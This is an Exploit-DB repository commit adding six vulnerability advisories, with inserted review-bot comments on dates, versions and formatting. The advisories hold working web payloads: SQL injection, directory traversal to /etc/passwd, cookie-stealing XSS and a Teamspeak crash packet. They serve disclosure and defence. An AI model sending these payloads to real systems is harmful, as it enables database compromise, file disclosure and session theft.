Updated 10_13_2014

Offensive Security 2014-10-13 04:45:24 +00:00
parent 174997aa11
commit 60e5c6c2a0
7 changed files with 87 additions and 0 deletions

@ -31456,3 +31456,9 @@ id,file,description,date,author,platform,type,port
34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0
34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0
34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
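
Review bot: The date column on the new rows for 34936 (2009-06-03) and 34940 (2009-05-29) is more than a year earlier than the other rows added here (2010-10-27 and 2010-10-28), although the source BIDs cited by those two files (44467 and 44510) fall in the same range as the 2010 entries (44457, 44501, 44502, 44507). Please confirm which date this column is meant to record and correct the two rows if they do not match it.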

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44467/info
i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to download and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected.
http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir
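
Review bot: The description says "multiple directory-traversal vulnerabilities", but the single request shown only puts a traversal sequence in the i parameter of streamfile.asp, so the file never says which other inputs are affected. Name each affected parameter in the text (the request also carries f), so that anyone writing an input filter or a log search from this entry covers all of them.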

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44457/info
LES PACKS is prone to an SQL-injection vulnerability.
An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks.
http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15
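
Review bot: No affected version is stated anywhere in this file, unlike the other advisories in the commit, which each name one (for example "i-Gallery 3.4 and 4.1 are vulnerable"). Add the LES PACKS version that was tested, or say that it is unknown. The vulnerable parameter (ID, according to the CSV title) also appears only in the example URL and should be named in the description.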

platforms/php/webapps/34937.txt Executable file
@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/44501/info
Feindura CMS is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Feindura CMS versions 1.0rc and prior are vulnerable.
Local file Include:
http://www.example.com/[path]/library/process/download.php?filename=[path/to/file]
http://www.example.com/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00
Cross Site Scripting:
http://www.example.com/[path]/library/sites/editor.php?category=[XSS]
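
Review bot: The file header marks 34937.txt as "Executable file", and the headers for 34939.txt, 34940.txt and 34938.txt in this commit say the same. These are plain-text advisories with nothing to execute, so they should be committed without the executable bit (mode 100644).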

platforms/php/webapps/34939.txt Executable file
@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/44507/info
W-Agora is prone to multiple local file-include vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to view and execute local files within the context of the webserver process or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
W-Agora 4.1.5 is vulnerable; other versions may also be affected.
http://www.example.com/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
'conf' folder:
http://www.example.com/news/for-print.php3?bn=1
http://www.example.com/news/login.php3?bn=1
Any folder (only on Windows-servers):
http://www.example.com/news/for-print.php3?bn=..\1
http://www.example.com/news/login.php3?bn=..\1
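
Review bot: The first four URLs in the list are unlabelled, while the last four sit under "'conf' folder:" and "Any folder (only on Windows-servers):", so a reader has to infer from the payloads which requests illustrate cross-site scripting and which illustrate the local file include. Add a "Cross Site Scripting:" heading above the first group and a "Local file Include:" heading above the two folder groups, as 34937.txt in this commit does.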

platforms/php/webapps/34940.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/44510/info
212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

platforms/windows/dos/34938.txt Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/44502/info
Teamspeak is prone to a memory-corruption vulnerability.
Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
Teamspeak version 2.0.32.60 is vulnerable.
The following proof-of-concept packet is available:
f2be000426ad7e00300000000001000a414141414141414141424141414141
4141414141414141414141414141414141414100ff99414141424242424141
414141414141414141
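
Review bot: The proof-of-concept packet at the end of the file is split over three lines with no statement of its encoding or of whether the line breaks belong to the data. If the bytes are hex-encoded and the three lines form a single packet, say so in one sentence above them, so that tooling which ingests this entry (for example to build a detection signature) does not read them as three separate values.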